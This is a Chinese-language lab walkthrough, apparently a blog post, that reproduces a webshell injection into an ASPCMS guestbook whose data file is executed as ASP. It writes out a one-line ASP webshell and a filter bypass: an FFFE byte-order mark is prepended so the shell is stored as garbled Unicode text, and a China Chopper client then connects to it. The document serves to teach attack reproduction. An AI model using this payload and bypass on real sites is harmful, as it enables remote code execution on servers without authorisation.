windows2003环境搭建,可参考上一篇WEB攻防-ASP安全-MDB下载-CSDN博客
将aspcms解压到C:\inetpub\wwwroot,创建网站并赋予internet来宾用户权限
配置启用父路径和主页指向
![](https://file.jishuzhan.net/article/1783832226639646722/e6d3a2d74278e16977cb1bc1179cc816.webp)
上一篇文章提到,数据库文件后缀为asp、asa
会被执行解析,所以当进行访问时,会直接以asp的形式进行执行
根据这个思路,尝试去插入一句话木马
![](https://file.jishuzhan.net/article/1783832226639646722/2b6083c6e563bcc8a9e29b0d8b196457.webp)
提交后文本被过滤了,所以菜刀无法连接,需要使用其他方法绕过过滤
![](https://file.jishuzhan.net/article/1783832226639646722/3da7b6fdbd616f127b3459412855a12d.webp)
![](https://file.jishuzhan.net/article/1783832226639646722/9bab3511b2514d27c137ab77c070992a.webp)
这里使用ANSI转Unicode的方法
参考文献:ANSI与Unicode互转 - ANSI编码的一句话以Unicode方式显示-CSDN博客
创建一个文本文件,输入一句话木马<% execute request("aaa")%>b,然后另存为ANSI编码
![](https://file.jishuzhan.net/article/1783832226639646722/923556516f01e59b617c8c26b474c07c.webp)
![](https://file.jishuzhan.net/article/1783832226639646722/3299349e04361caf3c5a08ef7b752878.webp)
使用winhex打开刚创建的文本文件,将光标定位到首位,选择编辑-->粘贴0字节,添加2个字节
![](https://file.jishuzhan.net/article/1783832226639646722/34071559acec2bf0108b96e6385d1522.webp)
将添加的两个字节改为FFFE, 保存再打开该文件,就完成了转码
┼攠數畣整爠煥敵瑳∨慡≡┩戾
![](https://file.jishuzhan.net/article/1783832226639646722/411e77b8aeefbbfaac746d6a22186cec.webp)
![](https://file.jishuzhan.net/article/1783832226639646722/deca5ce56ec48fbc82af5cc8d4e1adec.webp)
将转码后的乱发写入到留言里
![](https://file.jishuzhan.net/article/1783832226639646722/f644d8899f7e0c41edf88b1b7d7874e4.webp)
成功插入数据到data.asp中
![](https://file.jishuzhan.net/article/1783832226639646722/867046d8974b37961cd912501fa470a7.webp)
由于是复现,我们直接查看data.asp
记事本打开data.asp可以直接看到插入的木马
![](https://file.jishuzhan.net/article/1783832226639646722/fb735ee5c544d4f9ca67d26ed6bdf1cb.webp)
根据asp被执行的特性,就可以使用菜刀执行连接了
![](https://file.jishuzhan.net/article/1783832226639646722/51ae08b960b40f03006259817ee687d9.webp)
![](https://file.jishuzhan.net/article/1783832226639646722/0cee129273f6084a7c741d349f2d969c.webp)